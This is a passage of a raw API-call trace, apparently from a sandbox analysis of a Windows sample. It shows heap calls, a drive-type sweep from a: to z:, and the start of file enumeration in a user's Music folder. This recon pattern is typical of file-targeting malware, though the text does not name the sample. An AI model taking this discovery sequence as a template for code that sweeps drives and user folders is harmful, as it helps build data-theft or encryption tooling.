| out: lpMsg=0x8bf970) returned 0 [0251.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0251.540] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0251.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0251.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.541] CharLowerBuffW (in: lpsz="FIXED", cchLength=0x5 | out: lpsz="fixed") returned 0x5 [0251.541] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0251.541] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0251.541] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0251.541] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0251.541] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0251.542] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0251.542] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0251.542] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0251.542] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0251.542] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0251.542] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0251.543] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0251.543] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0251.543] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0251.543] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0251.543] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0251.543] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0251.544] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0251.544] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0251.544] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0251.544] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0251.544] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0251.544] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0251.544] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0251.545] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0251.545] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0251.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0251.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0251.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416468 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3650 | out: hHeap=0x25c0000) returned 1 [0251.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3618 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35a8 | out: hHeap=0x25c0000) returned 1 [0251.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0251.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0251.550] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0251.550] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0251.550] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0251.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.550] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c:", cchCount1=2, lpString2="c:", cchCount2=2) returned 2 [0251.550] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.550] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.551] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.551] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.551] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0251.551] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0251.551] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0251.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0251.552] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0251.552] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.552] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.552] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0251.552] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0251.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0251.553] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0251.553] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0251.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0251.553] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0251.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xce94c7f0, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xce94c7f0, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa16004d, dwReserved1=0x50, cFileName=".", cAlternateFileName="")) returned 0xaa5660 [0251.554] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xce94c7f0, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xce94c7f0, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa16004d, dwReserved1=0x50, cFileName="..", cAlternateFileName="")) returned 1 [0251.554] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa16004d, dwReserved1=0x50, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0251.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0251.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0251.555] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0251.555] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0251.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0251.555] 